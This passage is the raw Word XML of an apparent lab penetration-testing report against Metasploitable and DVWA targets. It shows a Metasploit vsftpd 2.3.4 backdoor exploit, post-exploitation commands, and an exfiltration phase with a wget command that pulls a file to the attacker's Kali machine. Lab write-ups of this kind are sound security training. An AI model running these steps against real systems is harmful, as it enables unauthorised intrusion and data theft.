      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="005E00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit(vsftpd_234_backdoor) &gt; exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63362AC1" w14:textId="77777777" w:rsidR="00F60182" w:rsidRPr="00B40682" w:rsidRDefault="00F60182"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whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2F35965C" w14:textId="301329F9" w:rsidR="00F60182" w:rsidRPr="00B40682" w:rsidRDefault="00F60182"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uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="005E00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8AADFC" w14:textId="24A1233F" w:rsidR="00F60182" w:rsidRPr="00B40682" w:rsidRDefault="00F6018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54D1E627" wp14:editId="598FA827">
            <wp:extent cx="2602346" cy="1258214"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="1382247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47122" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId36"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2611016" cy="1262406"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="377476F5" w14:textId="15E96475" w:rsidR="00827135" w:rsidRPr="00B40682" w:rsidRDefault="00827135" w:rsidP="00C60D92">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00B40682">
        <w:t xml:space="preserve">Figure 19: IP Address of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:t>Metapsloitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="63369623" w14:textId="60534CAF" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="0000478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76B1CAAF" wp14:editId="1DB9981C">
            <wp:extent cx="5268060" cy="3334215"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:docPr id="1749875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875553" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId37"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5268060" cy="3334215"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="517D4805" w14:textId="22A61496" w:rsidR="00827135" w:rsidRPr="00B40682" w:rsidRDefault="00827135" w:rsidP="00C60D92">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00B40682">
        <w:t>Figure 20: Setting RHOST and Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0B09A1" w14:textId="77777777" w:rsidR="00827135" w:rsidRPr="00B40682" w:rsidRDefault="00827135" w:rsidP="00C60D92">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16BF9336" w14:textId="2B03943A" w:rsidR="00004782" w:rsidRPr="00B40682" w:rsidRDefault="0000478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435A3EE0" wp14:editId="30F2FD2C">
            <wp:extent cx="2715697" cy="1565452"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:docPr id="1249585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85745" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId38"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2724087" cy="1570289"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="48115F86" w14:textId="4C8FDFBC" w:rsidR="00827135" w:rsidRPr="00B40682" w:rsidRDefault="00827135" w:rsidP="00C60D92">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00B40682">
        <w:t>Figure 21: Showing module options and payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBB46E4" w14:textId="6B32E2FB"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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A3AAD0C" wp14:editId="6B978F39">
            <wp:extent cx="2743200" cy="1511142"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1225372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72692" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId39"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2750042" cy="1514911"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A545672" w14:textId="440472EA"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79B94B54" wp14:editId="72F4A637">
            <wp:extent cx="3081270" cy="1492301"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:docPr id="133860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03530" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId40"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3097870" cy="1500341"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3C4BB6" w14:textId="0B1E71E0" w:rsidR="00827135" w:rsidRPr="00B40682" w:rsidRDefault="00827135" w:rsidP="00C60D92">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00B40682">
        <w:t>Figure 22: Connect and start Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EBAE25" w14:textId="3F030ED0"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53174A26" wp14:editId="793945F7">
            <wp:extent cx="2944419" cy="994630"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:docPr id="561225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25430" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId41"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2956725" cy="998787"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDD992F" w14:textId="4156FB18" w:rsidR="0000478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078544B0" wp14:editId="3DB994DD">
            <wp:extent cx="2820061" cy="1128524"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="117572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23812" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId42"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2835091" cy="1134539"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5645921A" w14:textId="4602DF2A"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0E4FA2F8" wp14:editId="16922E47">
            <wp:extent cx="2828423" cy="1667866"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="152655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54228" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId43"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2838115" cy="1673581"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F79F8D7" w14:textId="2770B765" w:rsidR="00827135" w:rsidRPr="00B40682" w:rsidRDefault="00827135" w:rsidP="00C60D92">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00B40682">
        <w:t xml:space="preserve">Figure 22: Adding Hosts for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:t>Metaploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2F775162" w14:textId="77777777" w:rsidR="00827135" w:rsidRPr="00B40682" w:rsidRDefault="00827135" w:rsidP="00C60D92">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C6FEA9B" w14:textId="75380001"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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00651B7B" wp14:editId="2F38EB95">
            <wp:extent cx="3019527" cy="1207008"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1613978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978775" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId44"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3037229" cy="1214084"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F674444" w14:textId="5B1AA141"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27A92670" wp14:editId="411AE047">
            <wp:extent cx="2767259" cy="1075334"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="951052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52407" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId45"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2786832" cy="1082940"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C68437" w14:textId="340ECEBA" w:rsidR="00827135" w:rsidRPr="00B40682" w:rsidRDefault="00827135" w:rsidP="00C60D92">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00B40682">
        <w:t>Figure 23: Starting Scanning and Find attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5542A59F" w14:textId="574AEDF9" w:rsidR="00EC71B2"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7098604A" wp14:editId="22F08833">
            <wp:extent cx="2799979" cy="1170432"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="147313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33956" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId46"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2807427" cy="1173545"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4940447C" w14:textId="5A1C8659" w:rsidR="00827135" w:rsidRPr="00B40682" w:rsidRDefault="00827135" w:rsidP="00C60D92">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00B40682">
        <w:t xml:space="preserve">Figure 24: Setting threads and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:t>Rport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="03D6246E" w14:textId="77777777" w:rsidR="00827135" w:rsidRPr="00B40682" w:rsidRDefault="00827135" w:rsidP="00C60D92">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="402A9A60" w14:textId="4127F85E" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00EC71B2"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4AF01C19" wp14:editId="56F2971B">
            <wp:extent cx="2845613" cy="1582117"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="117886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67644" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId47"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2860291" cy="1590278"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2123C2FC" w14:textId="6A4F2104" w:rsidR="00827135" w:rsidRPr="00B40682" w:rsidRDefault="00827135" w:rsidP="00C60D92">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00B40682">
        <w:t xml:space="preserve">Figure 25: Attack Successful </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799D989B" w14:textId="7085B300" w:rsidR="00F60182" w:rsidRPr="00B40682" w:rsidRDefault="00F60182" w:rsidP="00C60D92">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5430EFE6" wp14:editId="77904F97">
            <wp:extent cx="2823667" cy="1408079"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="480124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24925" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId48"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2847156" cy="1419792"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2540717D" w14:textId="38C1BFCE" w:rsidR="00827135" w:rsidRPr="00B40682" w:rsidRDefault="00827135" w:rsidP="00C60D92">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00B40682">
        <w:t xml:space="preserve">Figure 26: Backdoor Command Execution of Metasploit </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675A51CC" w14:textId="10A35195" w:rsidR="00F60182" w:rsidRPr="00B40682" w:rsidRDefault="00F60182" w:rsidP="00C60D92">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="647D701B" wp14:editId="3AD9A0EE">
            <wp:extent cx="2766695" cy="1084485"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="839535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535754" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId49"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2794677" cy="1095453"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2DB52F" w14:textId="1470B913" w:rsidR="00827135" w:rsidRPr="00B40682" w:rsidRDefault="00827135" w:rsidP="00C60D92">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00B40682">
        <w:t xml:space="preserve">Figure 27: Final Backdoor Exploitation </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D346763" w14:textId="478B9D7E" w:rsidR="00F60182" w:rsidRPr="00B40682" w:rsidRDefault="00F60182" w:rsidP="00C60D92">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The Metasploit framework was used to exploit known vulnerabilities on the target system, resulting in successful remote command execution. This confirmed the presence of insecure services and misconfigurations that allow unauthorized access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60774272"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8:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Data Collection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3CF2B1" w14:textId="29E696B9" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00F60182"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0E30F553" wp14:editId="1E8153A6">
            <wp:extent cx="3151708" cy="1039088"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="673755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55661" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId50"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3167742" cy="1044374"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3763FD" w14:textId="4D6399A1" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00000000" w:rsidP="00C60D92">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="46" w:name="_Toc215851901"/>
      <w:r w:rsidRPr="00B40682">
        <w:t>Figure 2</w:t>
      </w:r>
      <w:r w:rsidR="00827135" w:rsidRPr="00B40682">
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:t xml:space="preserve">: Data Staging on </w:t>
      </w:r>
      <w:bookmarkEnd w:id="46"/>
      <w:r w:rsidR="00827135" w:rsidRPr="00B40682">
        <w:t>DVWA Web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B03CC22" w14:textId="720EED60" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00F60182"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Relevant system and service information was collected through network scanning and enumeration to identify potential attack surfaces for further analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBB0B7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u w:val="single"/>
        </w:rPr>
        <w:t>Phase 9:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Exfiltration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B4C420"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Demonstrate data transfer to attacker system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED4FA48"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MITRE: T1041 Exfiltration over C2 Channel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B92835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 xml:space="preserve">Simple HTTP Pull </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>From</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attacker Kali:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC5324B"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wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="005E00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> http://192.168.14.137/research.txt -O extracted.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2715A1"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ls -l extracted.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7585AB"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r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="005E00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cat extracted.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4395FC90" w14:textId="28D31728" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00DA3FF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noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="452C2AC1" wp14:editId="09591ECB">
            <wp:extent cx="2980995" cy="1504369"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="1822248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48578" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId51"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2992874" cy="1510364"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C06FB7F" w14:textId="65C9A6D3" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00000000" w:rsidP="00C60D92">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="47" w:name="_Toc215851902"/>
      <w:r w:rsidRPr="00B40682">
        <w:t>Figure 2</w:t>
      </w:r>
      <w:r w:rsidR="00827135" w:rsidRPr="00B40682">
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:t>: Exfiltration Evidence: HTTP Pull from Attacker</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p w14:paraId="0123763E" w14:textId="77777777" w:rsidR="00B40682" w:rsidRPr="00B40682" w:rsidRDefault="00B40682" w:rsidP="00C60D92">
      <w:pPr>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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EB3983" w14:textId="14D316EE" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00000000" w:rsidP="00C60D92">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
